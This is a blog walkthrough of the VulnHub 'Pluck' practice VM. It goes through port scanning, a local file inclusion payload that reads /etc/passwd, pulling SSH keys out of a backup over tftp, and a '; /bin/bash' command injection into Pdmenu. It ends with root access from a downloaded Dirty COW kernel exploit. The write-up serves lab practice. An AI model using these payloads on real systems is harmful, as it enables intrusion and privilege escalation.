Skip to content

Pluck Walkthrough (VulnHub)

Hello Hackers.
Welcome to my another walkthrough. at this  time we’ll look another VM, Pluck is a new VM in VulnHub and its very easy to hack. This Is very good for Newbie hackers for practice and explore their Hacking skills.

 

We know Target IP : 10.0.0.15 (in my case)

Download Link : https://download.vulnhub.com/pluck/pluck.ova.zip

 

Now lets Start our Walkthrough.


Scan VM using namp

COMMAND

nmap -p- -sV 10.0.0.15

now we know server’s port 80 open. that means server to host any website.


Scan Vulnerability and Exploitin 

Explore this website and search vulnerability. When i visited its About and Contact us page i noticed  url , its showing me page=about.php parameter with .php file.

I  decided to try to exploit LFI( Local File Inclusion ) attack.

payload : /etc/passwd

URL look like : http://10.0.0.15/index.php?page=/etc/passwd

Note : at the end of file its leak Backup script file path and name (Highlighted in image above)

now url is : http://10.0.0.15/index.php?page=/usr/local/scripts/backup.sh

This script contain very usefull information (See Highlighted text in above pic)

now we know the server use tftp protocol for backup their data.

Lets Fireup our Terminal and type.

tftp 10.0.0.15

we know the backup file name backup.tar

tftp> get backup.tar

Goto your local directory and extract backup.tar

In Backup/home directory 3 user present but only paul have keys.

Using paul keys to login SSH (Try each key )

lets try ssh, Fireup ur terminal and type

ssh -i id_key4 [email protected]

Pdmenu appear. Now there i stuck for some mins to figure out what next.

So, i Decided to select Edit file option in Pdmenu

when i click Edit file shows prompt for name.

in prompt i typed ” ; id ”  (without quotes) and enter.<–This vulnerability is know as Command Injection

When u press Enter Vim screen up just type ” :q ” (without quotes )

After exit Vim u can see ur next command output which u inject in prompt.

Do Again last to step : Goto Edit file but this time type “; /bin/bash ” in prompt.

if you do all the things correctly. below the output.

We got paul’s Shell.


Privilege Escalation

now the final step s privilege escalation. to get root privilege first check kernel version (there are many way to get root access )

uname -a

kernel version is : 4.8.0

Dirty cow is the best vulnerability for this version of kernel.

URL link : https://www.exploit-db.com/exploits/40616/

Download this exploit in paul’s home directory using wget command.

wget https://www.exploit-db.com/download/40616

mv 40616 dirtycow.c

now compile and run dirtycow.c

gcc dirtycow.c -o  dirtycow -pthread

./dirtycow

We Got root privilege. woooooooooooooooooh

cat /root/flag.txt

 

 

Thank you. Comment Below for more

 

 


Published inVulnHubWalkthrough

12 Comments

  1. That is a great tip especially to those fresh to
    the blogosphere. Short but very accurate information… Appreciate your
    sharing this one. A must read post!

    • Touhid Shaikh Touhid Shaikh

      thanks For Appreciating Me….

  2. Touche. Sound arguments. Keep up the amazing work.

  3. Hey very cool blog!! Man .. Excellent ..
    Wonderful .. I will bookmark your website and take the feeds additionally?
    I am happy to find numerous helpful info right
    here within the post, we need develop extra strategies on this regard, thank you for sharing.
    . . . . .

  4. This is very interesting, You’re a very skilled blogger.
    I’ve joined your feed and look forward to seeking more of your magnificent post.
    Also, I’ve shared your site in my social networks!

  5. Thanks for finally talking about > Pluck Walkthrough (VulnHub) – Touhid's Blog < Liked it! asmr 0mniartist

  6. Hey, I think your site might be having browser
    compatibility issues. When I look at your blog site in Ie,
    it looks fine but when opening in Internet Explorer,
    it has some overlapping. I just wanted to give you a quick
    heads up! Other then that, superb blog! 0mniartist asmr

  7. I read this post fully about the resemblance of newest and previous technologies, it’s remarkable article.
    0mniartist asmr

  8. My family members always say that I am killing my time here at net,
    however I know I am getting experience everyday by reading thes nice articles.

    asmr 0mniartist

  9. That is a very good tip particularly to those fresh to
    the blogosphere. Brief but very precise info… Thank you for
    sharing this one. A must read post! 0mniartist asmr

  10. I think the admin of this site is genuinely working hard in support of his web
    page, as here every material is quality based information.

Leave a Reply

Your email address will not be published. Required fields are marked *